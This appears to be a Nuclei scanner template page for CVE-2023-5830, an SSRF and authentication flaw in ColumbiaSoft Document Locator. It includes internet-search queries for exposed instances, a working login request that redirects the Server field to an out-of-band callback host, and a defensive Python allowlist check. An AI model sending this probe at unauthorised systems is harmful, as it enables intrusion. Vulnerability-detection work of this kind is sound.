ColumbiaSoft DocumentLocator - Improper Authentication
ID: CVE-2023-5830
Severity: critical
Author: Gonski
Tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools,documentlocator
Description
Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are affected by an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locator application by modifying the value of the client-side SERVER parameter at /api/authentication/login and confirming the resulting external DNS interaction/lookup.
YAML Source
id: CVE-2023-5830

info:
  name: ColumbiaSoft DocumentLocator - Improper Authentication
  author: Gonski
  severity: critical
  description: |
    Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.
  impact: |
    An attacker could exploit this vulnerability to gain unauthorized access to sensitive information.
  remediation: |
    Upgrade to a patched version of ColumbiaSoft DocumentLocator to fix the improper authentication issue.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5830
    - https://vuldb.com/?ctiid.243729
    - https://github.com/advisories/GHSA-j89v-wm7x-4434
    - https://vuldb.com/?id.243729
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-5830
    cwe-id: CWE-287
    epss-score: 0.00427
    epss-percentile: 0.74333
    cpe: cpe:2.3:a:documentlocator:document_locator:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: documentlocator
    product: document_locator
    shodan-query:
      - 'title:"Document Locator - WebTools"'
      - http.title:"document locator - webtools"
    fofa-query: title="document locator - webtools"
    google-query: intitle:"document locator - webtools"
  tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools,documentlocator

http:
  - raw:
      - |
        @timeout: 20s
        POST /api/authentication/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        {
        "LoginType":"differentWindows",
        "User":"{{randstr}}",
        "Password":"{{rand_base(5, "abc")}}",
        "Domain":"{{randstr}}",
        "Server":"{{interactsh-url}}",
        "Repository":"{{randstr}}"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - '"Authorized":false'
# digest: 4a0a004730450221009edfab8d2959d534c04913c8a2e588e226c9e0218ff3cef6fd6894e1017c440102202dc6c66569ea9894460eba538627197051602b57c15a4305e34c87c9ff46b080:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-5830.yaml"
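
Until the upgrade is applied, the client-supplied Server value that this template manipulates can be validated in front of the application (for example in a reverse-proxy filter) before the login request is forwarded. The following is an added example, not part of the template or the vendor's fix; the allowlisted hostname, the function names and the case-insensitive key matching are assumptions.

```python
import json

# Assumption: hostnames of the Document Locator backends this deployment really uses.
ALLOWED_SERVERS = {"dl-sql01.corp.example"}  # constructed value

# Constructed sample bodies, shaped like the login request in the template above.
SAMPLE_OK = '{"LoginType":"differentWindows","User":"alice","Password":"x","Domain":"CORP","Server":"DL-SQL01.corp.example","Repository":"Main"}'
SAMPLE_BAD = '{"LoginType":"differentWindows","User":"alice","Password":"x","Domain":"CORP","Server":"unknown-host.example.net","Repository":"Main"}'


def _reject_duplicates(pairs):
    """Fail on repeated keys so a second "Server" cannot shadow the checked one."""
    obj = {}
    for key, value in pairs:
        if key in obj:
            raise ValueError(f"duplicate key: {key}")
        obj[key] = value
    return obj


def check_login_body(raw_body, allowed=ALLOWED_SERVERS):
    """Return (ok, reason) for a POST /api/authentication/login JSON body."""
    try:
        body = json.loads(raw_body, object_pairs_hook=_reject_duplicates)
    except ValueError as exc:  # JSONDecodeError and bad UTF-8 are ValueErrors
        return False, f"unparseable body: {exc}"
    if not isinstance(body, dict):
        return False, "body is not a JSON object"
    # Assumption: the backend may bind keys case-insensitively, so match that way.
    servers = [v for k, v in body.items() if k.lower() == "server"]
    if len(servers) != 1 or not isinstance(servers[0], str):
        return False, "exactly one string Server value is required"
    # Normalise case, whitespace and a trailing DNS root dot before comparing.
    host = servers[0].strip().rstrip(".").lower()
    if host not in allowed:
        return False, f"Server {host!r} is not an approved backend"
    return True, "ok"


if __name__ == "__main__":
    for sample in (SAMPLE_OK, SAMPLE_BAD):
        print(check_login_body(sample))
```

A request rejected by this check should be dropped and logged rather than forwarded, since the vulnerable application performs the outbound lookup while processing the login.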